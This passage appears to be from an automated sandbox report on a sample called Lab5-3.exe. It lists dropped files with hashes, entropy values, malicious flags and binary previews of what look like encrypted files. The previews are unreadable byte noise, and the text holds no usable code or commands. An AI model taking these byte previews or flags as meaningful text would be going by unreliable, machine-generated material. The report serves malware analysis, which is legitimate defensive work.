                                                                                                          SSDEEP:48:JcZBfJrdVhFxkqwyvHfUTid3hBaUoSGFcmeykEdEElU92i:JaBtdVhsy0Gx0uKeY2ElUJ
                                                                                                          MD5:648DD6A7C4679FAE1253B248864C6278
                                                                                                          SHA1:4775A9BBD6BAEAA5300FD8F69D2BB271326D74C7
                                                                                                          SHA-256:17F33A260B6AAFF1839472DDE292A77B05B5F64F81C57DA9F18571B304FEF8B5
                                                                                                          SHA-512:3ADC2788B4ABFEAEBCCED6B557BFCC140B636341E664EA6426DEEDB1A64ABAFA9B5589F047FC71C4698EA0BD3FF85032725219D10351A0F899B88BDEFDA02562
                                                                                                          Malicious:false
                                                                                                          Preview:..R..P.KU.E.L..>.R"h...F..F...9.YKD...qo.:..,....m...}...............C.:..#..Q.R...t.$..G.}.a.{v_.nhk.0k.P..bq.....L..Ld......*w.......zG.r..z-.zW.e.BR....*.........3...nMt........o?id..8d..:..@:.......H......JRJ..bO......~>...MVM....t\..;5...>.9e1..H..@R!...W...3.TreN...[..7{...[.@P.B..&%[:.......i..77..!'T..;..-.x..v........._....".n....~YM.R..O5.o..u..u..6.5y...g....=HAt...'I.."..-.@c.,|....t..7....s..]..\..+....'X2 ..Wq....~....~..6.-JU&....+.(...<..Y$|...P...........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2016
                                                                                                          Entropy (8bit):7.911624211470278
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+uqPBZlYEx8y1CF8WQjHfUTid3hBaUoSGFcmeykEdEElU92i:MPmpBF8WHGx0uKeY2ElUJ
                                                                                                          MD5:21F979F02671CEF22F9043F2AABA5D5E
                                                                                                          SHA1:DD29059B3EA931F07B73792808F3CAA072F326EA
                                                                                                          SHA-256:E80F956FF13A56238A6F6F03AFE939F43B8FC02E73801132B4BB7D791D3CEB66
                                                                                                          SHA-512:BE091DBB46BEADFA2253773943C4A2FECD6EB427C1F91748301829254A0D0420C1637EA7613E5372F17173573322ECF20CFF5E7FDAAD9992D3F8F3D65841E5DF
                                                                                                          Malicious:false
                                                                                                          Preview:.....qgm....kK."...]..2...*.!6....A~.wp+M.N...M......Se.....).e:q.?2.v9s.....)4M...h:}..........H.M.8g...T.].fL5S..]....8.o.7.o.d...J..@........p.Q..(...-..>.8*.z...F...}yi.a.....T......})....71...^..].[.q.~...C....,1..T..~Z.G.+..8..Ot?../7..M..._O.M.....rD...b.8.e..{.`...k[.!.R#..4.....(..<^m%.>..1I8.*.....`...>......}.1m^.FX.N.oQ...B..~v1...V..-. `8....i..5....S}EeR..z.1...".]..A.Y.....K .k.'..V..in.Z..v.P.Lc....uPG.N..~1....R.....\E....ya.=..r.D.....i.v~...=.L+q?}..%..........J<.?w.M....`bpLY57.R.B.J~.<...F.=Pd....n...,...C..I.c....T.......W..g..V.S..KS1.f9..bBk.......-...f..oD...8....".}u.I|.hw<j.M...\.e... j.....9....P...]TA.T.ja.$.S..K..V.K&.tpN.Y...{......V[..I..z......S..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.950379507156996
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MZXHKQWhw4dFRAy9ElSNvMNZseZ+jv5QkFlmHfUTid3hBaUoSGFcmeykEdEElU93:gXHKtFiy9HcDSvyq5Gx0uKeY2ElUJ
                                                                                                          MD5:3C0DFF2872F57049CD5D9666B42754FB
                                                                                                          SHA1:4E98B88D0B4D7DD5CBA5E289EEE065846271DC94
                                                                                                          SHA-256:A0D7EC6501E9C36633CF0E3711E657CE89D344E37EC0864A03F059E462549FD0
                                                                                                          SHA-512:E6830B72651E1ECA9A80741E76D9A8FC40FF3258CB015B0F77BB676CA0EC04F8491EDFD13E8EE168371B4BB5728043396C5F467C671F907106C3D51662D6FDA3
                                                                                                          Malicious:false
                                                                                                          Preview:.! E.d..i.<.+#@.,..[........!.\..;48.f.~...YR..%......,X.(s.A...V.9.|..oT....-.58@......3...>.Y/...K....b.q.c.....3V..ON .."....X{......X...5........FG..Xrv.1.x...$.Qn..p.8.Z..8...7..D .}7...@e..G..E..W..Q.-~.....i.u....3f..A...u..&,....BGvU....c.\..Y..C..T..ZQ...7...~ ........H:.<*WF./!.|.=..-OO.<..3aw2xR..x{|....%E)\~.....bHw....5.SD.K.z.R.h.S......j~m'.B...+.#.xt....F....k..2..6.Gyc....e..~.._M.)t."._.5.-.<W..u....y.;y.X...._..a].C..bC......p.E..;s~.......4.....2aZ ...K.$...3.x/..j.....[..du6.,......<u...l)4N...('N3!..\.9...B.X...n..K..\53.<8....K...&.p.(......|?.Lda..JJ.N......9.#....".]..O.....9..../.l..&....-..$^#..@..kK.D.._........7.I.&......%....K.'.......QL........q..G...*..X.}..5.u..N..t..-^.SJ.d....]t~.s.G.8..G.....<.[z...be.i....NY......U..1n d.Xl.P...c.:A....IXt.&...MF................&{NE....>..m..i8TT.S..1......>.*...o.K.2r.j....l.W..K.U.F.@T.4.....Fp.41"`.>.l(m..0...pB..C...+...B.&..H..Y.64.....^..y..h.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1824
                                                                                                          Entropy (8bit):7.906121370673571
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:73kKbbtgYHfUTid3hBaUoSGFcmeykEdEElU92i:TM/Gx0uKeY2ElUJ
                                                                                                          MD5:36DB530EDB9E5DEB894157B7DE8B47B4
                                                                                                          SHA1:CA15EA0EF6256FE77DDF14EE51207175632D74E9
                                                                                                          SHA-256:D5320BB36207679860189CFE2ED534DBE47D76413729BE4F25EDE1C502078C9E
                                                                                                          SHA-512:D655FD474DEE9E2B77C7E79390E50A0DDB27A7E073ACA42D661738D24504BE380C0DC9773354B092B4AA9D3EC4F20AA33248F74DD537C10A55874BC3817826BE
                                                                                                          Malicious:false
                                                                                                          Preview:.b..Z2Z...z.I.W.6.Z...tHDr.N.}...Y...T..........;..=i.*.T4..X....T..f.B..#..P..:.I.y.')..+h..$Em.BKB.*...YR9...3........V.%O..b..CZ4............Q....N..#;.........ZWO.F.....3..PV$.xULu...D.v.Lxh..k.9...D8...`Fg.i..hv..M.M..5.W.........o...^..o}.B.ue..a.d..q.X"'x...+....ft7..p..@..H.!~.I^.0.i.G&..e..-k.$.4..+....v.......+24...dC5.I..~.Cc=.......B4#.p.J..UO.;.b7..:.A.A...lz.q.....B.i..@tc!)R-.zR..X.v...+0J.jG........J.d..5.......'.7w!J..1........}`haS.vN......p...1.:...nh.xy.......t.!..!.....p.6..C..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3744
                                                                                                          Entropy (8bit):7.957802492845069
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:b6xM2jqFvakNvVcEZl7LY4Ob2OzMTOGx0uKeY2ElUJ:bz2iCAZlPY4m2dd0Cb
                                                                                                          MD5:458772BD2A5C95A65D9EE0594CEF4818
                                                                                                          SHA1:FF7CACD1D6044090DEC4B1D0A1E539ADC12C5BE1
                                                                                                          SHA-256:261A1B3D6B1FE2B82E001650C4614C766AB27C44844BA5E8F6CE88A2D3904B8B
                                                                                                          SHA-512:946E12B01700A0EDB66E6914BE7D65E74267A108809529CC9385473746E454C8FAD34628FC6F1508437CFE1831728A9BBB06F88B3AD96FCD96B599722082BD27
                                                                                                          Malicious:false
                                                                                                          Preview::}t..7.<1....2,5..n*.i...y 1H.(.,.ra./-..2".6......?%DD.V..ET.._...x.G.2.8..Y...S._....;d...<`..7..I.l............uY9...])H.#Z....P.....5G..%.....b.8...<&QC..6/d}...V.<...M...}.\`nt....Ib)....p.3....$xf.D..D.9..(m..M..D..E.L..E.6%.(..l....q..cCKY.0.6....aR.r...F.|....C94..F..%.^..@.m...3B?.....M. .9.....tC..........?...........1!bW>qQ.+>6.>4.Po..?.b....q..B.[.Vy9..:A...$.Q.f.P.z.y.m=....... ......8.'8.C.G$b...y..J.....x..eG%R.....s..@%g.......F'qY.....@..O...e.OJ......X.P.l..(DQ...S....ay..x.wG..}".C....o.kmW..9..L..S.^@4...<...i..hc}.4.M,p......b.qsT./6 R.6..bc.......A.*.z4....7j..-g.....G..[#.2._...^.~....6..eHT@....f.#.?0...>.......L.s..r..^..(..#o...F|s..%..../...k1.00...!..F...b.*@%S.v..2.-......C.m...r.(sQ..~..R...).A...5LQ.O..T5+..-P5.........8.!y......O}..ki...w....{.9U#h...|69.\....a.(?3.]....(Y..+e_]Sn..?.Z.e?u.#..^...<i..Q.uA[J..ud..!}i'...4....LS"l..[........@W...p..F..'.....:....w..w....EXa.O+...=[CC..{.Q....<`&.*...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.911658913220636
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qWnD2+N/gcjBrYLcSCEHfUTid3hBaUoSGFcmeykEdEElU92i:qYdj8OGx0uKeY2ElUJ
                                                                                                          MD5:B6F26D4F861762ABD759839F8C4D3DB3
                                                                                                          SHA1:6C844B2A69AAC4E7610C36B8AE71471C47416839
                                                                                                          SHA-256:EE10E79CCFA06E07AFBFF718792D73CDC4671B04FE22625E1C42300B2854BB6F
                                                                                                          SHA-512:BDE0BA37C2B20A70D6C150EF77CB10862F63D0ACF160A06E87DAA4E4BE1D20EA2A89E5B4F378D8981EE22FA6044EEB48FA2ADDAF9CD120A655F3FE10B56E4309
                                                                                                          Malicious:false
                                                                                                          Preview:l....1...r.j..M.;...cR.b..r.I.>.ED...-...p...E...7.u]..i.#';..SL..$.....=.B.$..5uR.>.c*......WJ...gm.....&2.b.U...1.j.o....g}......;........g..ct..>...........g..........2-`.]Z.|..6:...|....i..0e.b.....9>Gkh..e ...9..$!......:@.C......`.-.....X...1D.........A..MY3.dV....lb.R..R[...5......S.Z.v.-....({..P=u.......\o.n..+.?..lQOr...5..3zy=...@.U.}.<.m.....{...|."$T...../VU!...j...@9..o..........L.7..(%...h..Ef9..,.|l..H_.1....@.n.....T...Iq.......lUe...4c6...9.BP...6.#<i.4...P..#....f.....x.O...w3........@R.y....J...../.L.n.Uc;..H.+L.(#I~....|7....d;.A0..,am...rZ"53...o.;..!.W...1.>..\.50..6...>.z....H....+.u..0...4......:.....Q.....<.j..6......./....;uc...o&......lB0b....w+$.n`..9..[.4.^)1.........>...G-...~.0...=s0..2x.)..'..h...;:..s.1....u.^..R.cO/z{q.@..#....f.#u..........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1568
                                                                                                          Entropy (8bit):7.888649679761607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BXFm6HfUTid3hBaUoSGFcmeykEdEElU92i:B1oGx0uKeY2ElUJ
                                                                                                          MD5:B8AED7ACD2D711238D614FF2EFDBC91C
                                                                                                          SHA1:A148149D6C8E6B6C8B6A01BF5869C648F28C22BA
                                                                                                          SHA-256:F73AF3782437000CB4937346EF8C0DC28D892EB3CF7C9E5379240A019F566C71
                                                                                                          SHA-512:74D18A579AB26EC6BA0F9C7972185371DFCD3239B4C167EDA14FFDF7D95D8B6CC2128068816791D8A8D5D9A202016A15C54150AE94B11E0EC5968E9B48CDACD4
                                                                                                          Malicious:false
                                                                                                          Preview:`.q..;.h.g.\5.e7{2........ 5Bu.B,.y#x.b..4..i."...(+a.7..$...*...4...(#uT9.&5Cg.....U....w....B..W.q.D.k%`<...z..6......*y..g.1..x....e)._.f.T...lF9}.^...9`...2.e....^f........k..cVd.gl.J7...0.'.>..1.,..o.X..B;Dt.9.l.`.>.]).....=..c.Wx4......q..`fA....o$yT........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io......tM.jb..9o.l....B9.)z..n........y.=(..2s.}9.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.945070738486883
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:r/1IVVr1bbS9szXynkggGWWz4Gx0uKeY2ElUJ:r/1IV3bbS9yX2gGL0Cb
                                                                                                          MD5:2DACC99B0B7549E6674628F960F8E94E
                                                                                                          SHA1:6641330637BF8DD6723E27BB1A16804656723A5C
                                                                                                          SHA-256:B00A320C8E9D0E14A74DC830F8B15D552810D68084DDCFBFFA1666B3D1B0219F
                                                                                                          SHA-512:5CF2B1D631B357506AFB64375D8E76D930F875E2846085C29615C847614947ECC1352F3614949CF5CDFAF26B6D3E16BE23640D81D0357C43DC82B625AD16F808
                                                                                                          Malicious:false
                                                                                                          Preview:c{..#...\Q.....;.1......U.\O..l......7..N.:..w2....=B.j.B..n_...,..7.~..A.^.~.?Y.e..be ...ccJ.....-..<qB;p@.....s/#g.....}.D.E..$..5....f....-.6.%.=.Ss.....Wd?...WL.#.KNs<.a..xPeuU.h.t...W...1-.KA...j.JT..m.5.......X..vJ..b."G...*^..c.o./.Rz..]Q3m..[.`^.'..#k.|..|H.E...8.}...?....yi{..z..}.^.%..1uz.#,..I9.D.d._8o..xd1....U..n..cY......gT...oS.......Y...2.x.|...-..vld.wz....?`.-Sx.......o T...b............ .oP.~....".{T......n.~|.Vs.M47...>^....L..*A...F.[!.AH...-bDq2v.CE...fY.nZ...f..n0.B.......UK..............*l.....>..k..o..b]..z...K...W..rA..7......=..V.../H.l...l....2.....fE.?.. $..."..{.0....j..k......e.T/%. B..V.......!.,......................D^.:..=..w#..Qly....o.>.v............`.......?.. ...H....".}..S.........}.......b.Ro.J3...0..T\..V.....*......=.[..).c.y...1..1.-./A..N)...H#....)....c..Y...p.\..*].....rj$.Z...b...S...k.8f@...(4..|.w6(:..g.,........H..X.B.1.b.Se... 0....wn..B.Ni..L;2.S:.2...zb.M._._......o4....._<0-B.fu.....^.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.938035650416297
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:K88D+R8usI2sFvE8/6YasVPw1VkUO0yDYJh53iiBWwGB9HfUTid3hBaUoSGFcmeR:K8DKSy1smVkF0j3iiBnUWGx0uKeY2Elk
                                                                                                          MD5:D92A3F56705DF4FF85B55C54B6CA905C
                                                                                                          SHA1:38617E3BF73673B5A3210842CD5EFB16DD36A797
                                                                                                          SHA-256:D6F9D764B8875C2E35578C6B1C67CDDD8463C5CFAFD4C2795F4E06E29D68F72C
                                                                                                          SHA-512:A81037BF48D0DBD4EDBCF6F5CB100106670EEC9A4CFB058CDD0622537E51AC468D25B829CC19FDE7DA40527F1F04B79D92FA844879880C212BFDDCFC611C0C2E
                                                                                                          Malicious:false
                                                                                                          Preview:<...Mo'..n.7..c..!.U.....}..5....T.....+-.S....vE..-...J.....isb.[..y..Q.G.......p.e.NMAm!.)f.. ...O.........>+&.....;...P.b...v.1..p.>..\1..W..Jh.\?..d......h..0 .0...{..i..#..E.a...-..mFB9.+...`...^.c.JN..I.gL:....].C.^.........."...3.L...9....q...-E6.-BQ.-a>.}..r.!.g/.....ei..,o...R#F....5..........K]{..d...(6....X.1...YW{.P......*$(....o#=....>fg84......79zz..........'.)..C.-.y.+.b..B.@...b.7W8............V..1-..'jR57.^.E.j.I.....8.0.......<..Z.!E..Z...l...j;#..MB::.E..o..ysi.]..m...C,...Y.au..{(C8...| ..%...X........5..}.....m...:......e&q.|>6...|W....Q.a.R....>..&q?.......mB...zXK.d.9..8.....r.*.O....j7.>3m....>P.q>..|..`..I.K6...~.0.R)..?..@I:h..m..[.n...!c.....h.1.1q.E.q.M..]6NV9.A2...A....]......{..J...7.>(.jT...$j".E.'...C}~Ydv.....>i....vD..qo.=.``l..w.O:.d..l...L.~?]....x....*.u._..."....].4..\..).'77.9..*:.u.+e.0o.\nO..UH.Ze..j...UK.C-b...{....4...|.Z.s2...t..43....c..-.!F`4.....\..H...(.....a.k..M.3...v.#gO...3.&....:..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1632
                                                                                                          Entropy (8bit):7.884992480395285
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:i37/2rHfUTid3hBaUoSGFcmeykEdEElU92i:ArGx0uKeY2ElUJ
                                                                                                          MD5:E947599DDBBD117BCA434C08054EFB80
                                                                                                          SHA1:F2DA8EC46F5A473CBB05B8D9C280B5FAAB34F2AE
                                                                                                          SHA-256:4D70549724147CDA8C6273CDFD15DF3D21460DDC45582BA612CDC22FDBFBFE85
                                                                                                          SHA-512:A07BA2015CD3BD1DD3F7A6F29D1447433EB8E97B687DA0C873CDE830190679DF751F649E3CC828EFD8DEAC1C9C42F610DDDB663B5823E10659700D7746F8FFAA
                                                                                                          Malicious:false
                                                                                                          Preview:.qM.....?....I.;EY......{-... .x.........].F...c...S..b.7...w........X..~...',...?..i1.e6.....Q.t...0.).f.ko.`..X....A.S......T.|..|Y3..*..........(..c...O..[............)3 .&QQ........+......F.snq.sk.p..d..^..;.s.<....1( .8o.R..OpV.6P...;..6.........$.A.1.X.;q...<.P..7.WtQ.5..(..uXh........uM"K0>..*q;.j....cDxo.:.6...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36880
                                                                                                          Entropy (8bit):7.99445726931217
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:MMicCSh9kQxagXQ8MCG/6JlMtRkV22vcfokW1hl0EYajU388GZ:M0h9kQx3ACcrkXkfql0EHk89Z
                                                                                                          MD5:ADB6DAAFD1ABB8F084CCA7375A8A8042
                                                                                                          SHA1:D827EB41C5457807468B314060EA6925A9614E66
                                                                                                          SHA-256:6A00347903C965E1C853249F39C6AABFE1A1E90BEB4F07D4CA0A3692F2734D52
                                                                                                          SHA-512:F620B618F85B9A03DB37E8394B8C367D9AD30B569C765476A9865410269707677FFB682C4620E3C5E580EDC2705DFEB72D1D96888429115CB040E939F5A582A2
                                                                                                          Malicious:true
                                                                                                          Preview:...yU...C=.-.V7.nAI.0.>.)..+.E....XH....C..d....S..0.q..O...`..&j.Hc.t.;...?^..a...#..(.t...*....m...'.Y R.~...9..S......z..3$..&.~....B>.......-I.#..|p.......{sb...x...w.}./.[U..-....~.HI...2=..B.9.l..._..Zo..M++&G..=.....0.S../..X....{....=.......alp.Bu.G.&.y.P.n.D....NC}....L........|..%..l......k.-.;.....3!uk..$I...b...?..>.K;....T.>l+............x@K.N$.2.....D.Jq....gb..n.kM9......D.U.........e4..?.jN....KG......i..}z...*Y.F..X....+.]..vr~........?....7.%.....E.gu.S.........X4.|n..8.....vZ..8....4...~=...|.W./rHO.n-....54h..8>..!3.E5..`.......=%x.p.9.P...+C...i...p..d...Mt.aD.j3i...W..Gh.....#.....V....u...j....I.%{0...%L.j...{.Y~^..j8.{@.CT......~..*N.OB......h`.jg$.2...t.j.QY.D.{S..M.U.*....8.l.^...\.N(..?..d..R...v..7....e......9tm.z....3..$.bey...Y{....|...k.t.5<.r.,E.....\O..M.\..m.......l.E...........&.c2=..c.....%.d...R..k,.e^.S......A.k.h1..gF.Tgr.....E.......m,z.|:....+]7.+..*F.s{.q.:.......@9..u.a..?...y...~.X......l.......yO.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4016
                                                                                                          Entropy (8bit):7.956674293968847
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:uLS5VZswZ5pqeueXYOx4BAI9KbUBWKT0MDGx0uKeY2ElUJ:umV75pqezX1MvbW6g0Cb
                                                                                                          MD5:74CC6D8B8F60B2FC3FA8EA2FD1748055
                                                                                                          SHA1:0ED654AE45A09C3C48F6371AF7153CCC8B46EEC1
                                                                                                          SHA-256:450EDE21E8F5CA1658254F1853415095E7A404D48F55717A3FDC35225B44D11D
                                                                                                          SHA-512:8B209AB0CBC5371CD3526577F5CCEF80E8AD2B7224A07CFD5BE00A34D206FC4AD524F7390D74D144009B86F2F666DA326189EEDEDBBCF6E6F5045FCA24D3A20B
                                                                                                          Malicious:false
                                                                                                          Preview::.Dx..sn..N..4Ki.d.a...|w>.n.. G]b.G;./.}.f*...\\h.5.....91.....t..U..N....l.U..a.....<e?...w...v..w..Cp]y......"..3..(...*wo.QfS....D1.FD&...F..UJ..$.p*....j...&[V(|$.X.@A\~.....%2]..%d_ij...!....{..>]..Y%...(...c.........Z........}t"Q.......$6.uo.......".F.....n.<O..MZ.:v..lc..1.^?...XVs3C7.[k.>m....d....#...!=:.......+).|..O....g.Ga{pW..d..M+&SS+_...7.......q....ub.O<..}V.../.*.5.1.|a..../.%.,...pY.....d.)EVY.6......Q.#:.i.7.....J.b..%.."B...:.^..>...{..C;.>.......kx.6.h.'uE./..>#.5.P.`r....T.zS..M..(...}.*.28,r...}.1T.Y..0..........3`.>6.......#.mN.8.eL4eQ;z._w...9... .7{...5q.f%.;;.O.0..L...)....{..Rq....:L..8.B....Z9i....)|=.L.WH.....F.>...5.m..+..[..a..7.&O.6V...r4...(....j.?|...&...O>...!....H..8..........76..3...5.H.T.22....4.%...k#.>&.....bM.8..+`SrH........a..~...........c!:.G>.}E..^...0wj.(.d.n...oilt...<.......T..*....@?...7..(..._.J).Oz...y7i......f......=.lS..l.\e%....^-k..m...h....0...}\{..d~...{.......a.9.EZS.i..l.$.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1920
                                                                                                          Entropy (8bit):7.90215294083899
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MbVm4AtLjHfUTid3hBaUoSGFcmeykEdEElU92i:Ml2LwGx0uKeY2ElUJ
                                                                                                          MD5:F554EC06C94F07F13D3A08FBCD9E4D91
                                                                                                          SHA1:92B2487ED622CCB6F3770136C6E969B53D7CFB8E
                                                                                                          SHA-256:8EB7ABFA97CD3111498AC9C03C884D0E191E6FBD2D4FAB3943AA772D6D405D55
                                                                                                          SHA-512:EEE264265C8FF92A39DEE0793AE70198CAA1A0FBE338CC5C7091665DC4BA3D174649CBCE3D5ADEE342D883B0854EA02B2D88AD5B253CF88DA690655ACE54898D
                                                                                                          Malicious:false
                                                                                                          Preview:.9....z7.&..$^..x......n..p.).s.F...B.P.].G.;N...-..g....O.2.Q..er...%...9?)......(-......#W..E..+p]..v............J.a..D`.a+.c.R.n.Q.P...$7..%.n...c..sX....`..^.f*Q.. .c..N......W.w.4O.:..S.,...rE.s.##.....~.Yy......\U...<.$).`.;:..?.8....q..Ti....{*............-....9......,`.E..E.g...zn%4..\....V<.f.o6c.;....~.../h.8...Hd..yhtj.1.L...\..6Y..\.v[.t...<w&......z.&.(...<.$Bau....T!.v.p.-.....B4..W.L.prJ"...hBG.N....HA...r..'.:.Y....t.C.gu...%.m......\B<w...I..:j.?........+U..2..bg.......L7.i.......t.m..9$.....k.n.1.p....3..,.Y..[xI......4..>f.G.N..3.....1.'.9Q..6....).sEyA#.,.z@...@n...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4128
                                                                                                          Entropy (8bit):7.962710278115791
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:d1e3Wb+7mgDffoAM+pXBJNnZZ6Gx0uKeY2ElUJ:d4W+qgDXoJ+pXB3nZZp0Cb
                                                                                                          MD5:31E2AAA5BB4433DF77DB5F0D0421C9EC
                                                                                                          SHA1:CA2A80188B8FB0AE0E990878B14DA2D376248C5D
                                                                                                          SHA-256:7B3B08737676CD4E7A081BB0BCF7B40D5C66470E4C370CA7A82D18D0F05B7B98
                                                                                                          SHA-512:870A3F16E3712BABD91B581DEFA284D2DC79740212E25DAB581831B74446284E3E54575B50CB84FD845BC8EE681A614E0A9B776B563D1EC882005CCF6071590D
                                                                                                          Malicious:false
                                                                                                          Preview:zA`....nH$}.8..7.../..=DZlw.....]8.(.&.I...a.9{M.J..=|.,O./SuI....,...c`.....b..Fo..=.S..>.z.F.......R..u......e..fV1q]A~.....yX.....+<oH...I...(........].^........Z.k...-."Rt...Z.........p.P.....r..f.f*...'.....i..g.-<.p..K......}.^`.....S....8.........~..3.<.t....F......P@z.}..p....>^T....;.5....s.c@....u1.+CUcB.U..3..m<....*.nj..&.n...+..<P0..J4.6.....@V7;..."#....\*...W.Q ../F....h2......c.O..i|Lsgn......Q_...E......{......%..i'",u.1.g.4..YNl...U..C...;..s....`.......W_..Y=.........X.........4w.B..L..c.D+Y.S.;.h..b#.8...T........../.f.M..nHrR.h...L..KFH....e.l/..H.>.'....u.r.r....2......Ft..g.k...10....LRU]...@....-..]..F.5_.)c...0...V.. =...?.H...Q..`.sI..+,....v...d...IV..._.I.......`...../.O.m....ztT.r...o...&.O. ...>../..PH...T. xBw..K..t.-..K.pY.....^@....s.+MG.HL;<.Xv.2..q...].....\.`...j6_9j.A.....M.Up^V..7e.%.%cB?+..a.'&.....%{.......n.D.]|.N..Z.^..:.....=.19.=..&@..:...{.....]....$I.h...$..e....5z...._=.+.6......V..0N...Tg...B..VM/
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.930609746671056
                                                                                                          Encrypted:false
